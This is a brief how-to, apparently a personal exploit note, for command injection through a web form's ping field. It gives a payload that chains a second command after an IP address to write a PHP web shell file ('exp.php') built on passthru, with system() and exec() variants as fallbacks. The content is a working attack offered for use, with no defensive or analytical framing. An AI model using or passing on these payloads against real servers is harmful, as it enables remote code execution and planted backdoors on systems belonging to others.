Exploit Command Injection
type anything just for command "PING"
this PAYLOAD for type and command and execute in cmd or terminal
name file for payload
Enter when the Command-Injection
1.1.1.1 & echo "<?php passthru($_GET['excute']); ?> " > exp.php
Func other |
---|
passthru() |
system() |
exec() |
<?php system($_GET['excute']); ?>
<?php exec($_GET['excute']); ?>
<?php passthru($_GET['excute']); ?>
You can use this func replaced "passthru" if had any problem